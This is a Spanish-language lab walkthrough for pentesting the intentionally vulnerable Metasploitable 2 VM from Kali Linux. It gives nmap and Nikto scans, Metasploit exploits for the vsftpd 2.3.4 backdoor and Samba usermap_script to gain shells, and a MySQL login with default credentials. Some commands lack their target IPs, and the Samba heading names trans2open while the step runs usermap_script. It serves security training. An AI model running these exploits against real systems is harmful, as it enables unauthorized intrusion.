====== Plan de Evaluación y Explotación de Vulnerabilidades en Metasploitable 2 ======
Plan detallado para comprobar las vulnerabilidades de Metasploitable 2 usando
Kali Linux. Este plan está diseñado de manera didáctica para que sea fácil de
seguir y entender. Metasploitable 2 es una máquina virtual vulnerable diseñada
específicamente para pruebas de seguridad y formación en ciberseguridad.
===== Paso 1: Configuración del Entorno =====
* **Descargar e instalar VirtualBox o VMware**: Si no lo tienes ya, descarga e instala VirtualBox o VMware Workstation Player.
* **Descargar Metasploitable 2**: Descarga la máquina virtual de Metasploitable 2 desde el sitio oficial de Rapid7.
* **Configurar la Máquina Virtual**: Importa la máquina virtual de Metasploitable 2 en VirtualBox o VMware y asegúrate de que esté en la misma red que tu máquina Kali Linux (puedes usar una red NAT o una red interna para aislamiento).
* **Iniciar las máquinas virtuales**: Inicia tanto Metasploitable 2 como Kali Linux.
===== Paso 2: Reconocimiento =====
==== Identificar la dirección IP de Metasploitable 2 ====
* En la terminal de Kali Linux, utiliza el comando ''nmap'' para identificar la dirección IP:
sudo nmap -sn 192.168.0.0/24
* Encuentra la dirección IP de Metasploitable 2 en los resultados.
==== Escaneo de Puertos y Servicios ====
* Realiza un escaneo completo de puertos y servicios en la IP de Metasploitable 2:
sudo nmap -A -T4
* Esto identificará los puertos abiertos y los servicios que se ejecutan en ellos.
===== Paso 3: Identificación de Vulnerabilidades =====
==== Buscar servicios vulnerables ====
* Analiza los resultados del escaneo de Nmap para identificar servicios conocidos por ser vulnerables. Metasploitable 2 incluye servicios como FTP, SSH, Telnet, SMB, y varios otros.
==== Uso de Nikto para análisis de vulnerabilidades web ====
* Ejecuta Nikto contra la IP de Metasploitable 2 para identificar vulnerabilidades en servicios web:
sudo nikto -h
===== Paso 4: Explotación de Vulnerabilidades =====
A continuación, se describen algunas vulnerabilidades comunes en Metasploitable
2 y cómo explotarlas.
==== Explotación de VSFTPD 2.3.4 ====
* **Identificación**: VSFTPD 2.3.4 es un servicio FTP que tiene una puerta trasera conocida.
* **Uso de Metasploit**:
sudo msfconsole
* Dentro de Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST
exploit
* Esto debería darte una shell en Metasploitable 2.
==== Explotación de Samba (SMB) usando el exploit de trans2open ====
* **Identificación**: Samba 3.x tiene una vulnerabilidad conocida.
* **Uso de Metasploit**:
sudo msfconsole
* Dentro de Metasploit:
use exploit/multi/samba/usermap_script
set RHOST
exploit
* Esto debería proporcionar acceso a una shell con privilegios de root.
==== Explotación de una vulnerabilidad en la base de datos MySQL ====
* **Identificación**: MySQL en Metasploitable 2 tiene credenciales por defecto (root:root).
* **Explotación manual**:
mysql -u root -p -h
* Introduce la contraseña ''root''.
* Una vez dentro de la base de datos, puedes ejecutar comandos SQL maliciosos.
===== Paso 5: Documentación y Mitigación =====
* **Documentar las vulnerabilidades encontradas**: Registra todas las vulnerabilidades identificadas, los métodos de explotación utilizados y los resultados obtenidos.
* **Recomendar medidas de mitigación**: Sugiere cómo pueden solucionarse estas vulnerabilidades, como actualizar el software, cambiar credenciales por defecto, y deshabilitar servicios innecesarios.
===== Conclusión =====
Este plan proporciona una guía completa para la evaluación y explotación de
vulnerabilidades en Metasploitable 2 usando Kali Linux. Cada paso incluye
instrucciones detalladas y comandos específicos para facilitar el aprendizaje y
la comprensión.